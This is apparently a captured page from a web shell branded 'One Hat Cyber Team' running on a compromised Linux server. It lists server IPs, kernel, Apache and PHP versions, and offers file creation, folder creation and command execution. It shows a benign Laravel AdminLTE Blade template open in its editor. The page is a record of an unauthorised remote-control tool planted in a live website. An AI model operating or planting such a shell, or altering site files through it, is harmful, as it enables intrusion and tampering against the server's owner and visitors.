One Hat Cyber Team
Your IP :
172.69.17.106
Server IP :
188.114.96.7
Server :
Linux advantage-project 5.14.0-503.26.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 19 16:28:19 UTC 2025 x86_64
Server Software :
Apache/2.4.62 (Rocky Linux) OpenSSL/3.2.2
PHP Version :
8.3.17
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
html
/
resources
/
views
/
vendor
/
adminlte
/
Edit File:
plugins.blade.php
@foreach(config('adminlte.plugins') as $pluginName => $plugin) {{-- Check whether the plugin is active --}} @php $plugSection = View::getSection('plugins.' . ($plugin['name'] ?? $pluginName)); $isPlugActive = $plugin['active'] ? ! isset($plugSection) || $plugSection : ! empty($plugSection); @endphp {{-- When the plugin is active, include its files --}} @if($isPlugActive) @foreach($plugin['files'] as $file) {{-- Setup the file location --}} @php if (! empty($file['asset'])) { $file['location'] = asset($file['location']); } @endphp {{-- Check the requested file type --}} @if($file['type'] == $type && $type == 'css') <link rel="stylesheet" href="{{ $file['location'] }}"> @elseif($file['type'] == $type && $type == 'js') <script src="{{ $file['location'] }}" @if(! empty($file['defer'])) defer @endif></script> @endif @endforeach @endif @endforeach
Simpan